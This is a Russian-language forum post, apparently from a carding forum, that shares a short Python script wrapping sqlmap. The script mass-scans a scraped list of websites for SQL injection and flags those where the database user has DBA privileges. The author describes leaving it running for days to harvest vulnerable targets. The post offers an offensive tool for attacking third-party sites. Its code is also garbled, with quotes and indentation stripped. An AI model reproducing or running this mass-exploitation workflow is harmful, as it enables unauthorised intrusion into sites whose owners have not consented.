Простенький скрипт для поиска is dba в SQL INJ

И так друзья, решил вам подкинуть ( если кому надо ) простенький скрипт написанный на скорую руку для глабального и автоматизированного поиска уязвимых SQL INJ сайтов с IS DBA: TRUE ( повышенные права пользователя SQL ). Итак:
1) Для начала мы должны сделать git clone sqlmapа ибо на его базе работает скрипт
2) После гит клона ( все исходники sqlmapa лежат в папке sqlmap ) создаем скрипт который должен лежать рядом с папкой. Код ниже
Code:

#!/usr/bin/python
import urllib
import sys
import os

def sites(name, id):
if os.path.exists(name):
text = open(name, r).readlines()
return text[id]
else:
sys.exit(1)

if __name__ == __main__:
for i in range(0, len(open(sys.argv[1], r).readlines())):
url = http:// + sites(sys.argv[1], i).replace(, ).replace(
, ).replace(https://, ).replace(http://, )
os.system(echo + url + && ./sqlmap/sqlmap.py --url= + url + --is-dba --batch --random-agent --threads 10 && echo ================================)​

3) Парсим базу ссылок, которые хотим проверить и сохраняем их в тхт файл.
4) Запускаем скрипт так: python script_name.py txt_file.txt > file_for_result.txt &
И так разберем данную конструкцию, первый тхт - файл с ссылками, фторой файл для контента ( который нам пригодится для поиска ) и вот этот знак - & для того, что бы скрипт работал даже после закрытия терминала ( к примеру я этот скрипт использую на своем Raspberry pi, подключаюсь по SSH, запускаю скрипт и жду дня 2-3 ).
5) Открываем файл file_for_result.txt и ищем фразу:
Code:

is DBA: True​

и все, профит!
P.S. Для поиска используйте CTRL + F ( для профанов )
(с) Caligula for club2crd.cc